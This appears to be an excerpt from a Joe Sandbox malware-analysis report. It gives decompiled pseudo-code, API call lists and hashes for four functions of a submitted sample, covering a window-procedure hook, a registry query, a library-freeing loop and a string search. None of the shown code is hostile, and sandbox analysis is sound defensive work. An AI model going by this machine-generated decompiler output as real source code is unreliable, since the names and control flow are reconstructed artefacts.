                        • String ID:
                        • API String ID: 2102729457-0
                        • Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                        • Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
                        • Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                        • Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E004054F0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                        				int _t15;
                        				long _t16;
                        
                        				_t15 = _a8;
                        				if(_t15 != 0x102) {
                        					if(_t15 != 0x200) {
                        						_t16 = _a16;
                        						L7:
                        						if(_t15 == 0x419 &&  *0x7a1f34 != _t16) {
                        							_push(_t16);
                        							_push(6);
                        							 *0x7a1f34 = _t16;
                        							E00404EB1();
                        						}
                        						L11:
                        						return CallWindowProcW( *0x7a1f3c, _a4, _t15, _a12, _t16);
                        					}
                        					if(IsWindowVisible(_a4) == 0) {
                        						L10:
                        						_t16 = _a16;
                        						goto L11;
                        					}
                        					_t16 = E00404E31(_a4, 1);
                        					_t15 = 0x419;
                        					goto L7;
                        				}
                        				if(_a12 != 0x20) {
                        					goto L10;
                        				}
                        				E004044C2(0x413);
                        				return 0;
                        			}






                        APIs
                        • IsWindowVisible.USER32(?), ref: 0040551F
                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405570
                          • Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Window$CallMessageProcSendVisible
                        • String ID:
                        • API String ID: 3748168415-3916222277
                        • Opcode ID: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                        • Instruction ID: 9d4fd90c1d1287ad01f41678c6dcc1ca6f3bae65868fe0495ea0105890a895ad
                        • Opcode Fuzzy Hash: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                        • Instruction Fuzzy Hash: CC01BC71100648BFEF209F11ED80A9B3B27FB84390F548037FA057A2E5C77A8D529A69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E004063E8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                        				int _v8;
                        				long _t21;
                        				long _t24;
                        				char* _t30;
                        
                        				asm("sbb eax, eax");
                        				_v8 = 0x800;
                        				_t21 = E00406387(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                        				_t30 = _a16;
                        				if(_t21 != 0) {
                        					L4:
                        					 *_t30 =  *_t30 & 0x00000000;
                        				} else {
                        					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                        					_t21 = RegCloseKey(_a20);
                        					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                        						goto L4;
                        					}
                        				}
                        				return _t21;
                        			}








                        APIs
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F28,00000000,?,?,Call,?,?,0040664F,80000002), ref: 0040642E
                        • RegCloseKey.ADVAPI32(?,?,0040664F,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 00406439
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CloseQueryValue
                        • String ID: Call
                        • API String ID: 3356406503-1824292864
                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403B34() {
                        				void* _t2;
                        				void* _t3;
                        				void* _t6;
                        				void* _t8;
                        
                        				_t8 =  *0x79ff0c; // 0xa2f438
                        				_t3 = E00403B19(_t2, 0);
                        				if(_t8 != 0) {
                        					do {
                        						_t6 = _t8;
                        						_t8 =  *_t8;
                        						FreeLibrary( *(_t6 + 8));
                        						_t3 = GlobalFree(_t6);
                        					} while (_t8 != 0);
                        				}
                        				 *0x79ff0c =  *0x79ff0c & 0x00000000;
                        				return _t3;
                        			}








                        APIs
                        • FreeLibrary.KERNEL32(?,76F1FAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
                        • GlobalFree.KERNEL32 ref: 00403B55
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B34
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Free$GlobalLibrary
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 1100898210-3936084776
                        • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                        • Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
                        • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                        • Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405F6F(void* __ecx, CHAR* _a4, CHAR* _a8) {
                        				int _v8;
                        				int _t12;
                        				int _t14;
                        				int _t15;
                        				CHAR* _t17;
                        				CHAR* _t27;
                        
                        				_t12 = lstrlenA(_a8);
                        				_t27 = _a4;
                        				_v8 = _t12;
                        				while(lstrlenA(_t27) >= _v8) {
                        					_t14 = _v8;
                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                        					_t15 = lstrcmpiA(_t27, _a8);
                        					_t27[_v8] =  *(_t14 + _t27);
                        					if(_t15 == 0) {
                        						_t17 = _t27;
                        					} else {
                        						_t27 = CharNextA(_t27);
                        						continue;
                        					}
                        					L5:
                        					return _t17;
                        				}
                        				_t17 = 0;
                        				goto L5;
                        			}










                        APIs
                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F97
                        • CharNextA.USER32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA8
                        • lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: lstrlen$CharNextlstrcmpi
                        • String ID:
                        • API String ID: 190613189-0
                        • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                        • Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
                        • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                        • Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8
                        Uniqueness

                        Uniqueness Score: -1.00%